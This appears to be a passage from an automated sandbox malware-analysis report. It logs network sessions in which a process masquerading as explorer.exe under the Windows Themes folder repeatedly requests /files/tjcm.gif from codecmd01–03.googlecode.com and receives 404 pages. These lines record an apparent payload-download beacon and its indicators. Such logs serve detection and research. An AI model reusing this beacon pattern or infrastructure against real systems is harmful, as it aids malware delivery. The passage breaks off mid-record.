                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      38192.168.2.549752108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:14:36.964298964 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd03.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:14:37.683485031 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:14:37 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:14:37.683535099 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      39192.168.2.54975374.125.206.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:14:38.854098082 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd01.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:14:39.554991961 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:14:39 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:14:39.555018902 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      40192.168.2.549754108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:14:39.945394993 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd02.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:14:40.650599003 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:14:40 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:14:40.650865078 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      41192.168.2.549755108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:14:41.504991055 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd03.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:14:42.213651896 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:14:42 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:14:42.214243889 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      42192.168.2.54975674.125.206.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:14:42.568978071 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd01.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:14:43.297048092 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:14:43 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:14:43.297092915 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      43192.168.2.549757108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:14:43.725125074 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd02.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:14:44.413875103 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:14:44 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:14:44.414096117 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      44192.168.2.549758108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:14:44.856512070 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd03.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:14:45.576670885 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:14:45 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:14:45.576813936 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      45192.168.2.54975974.125.206.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
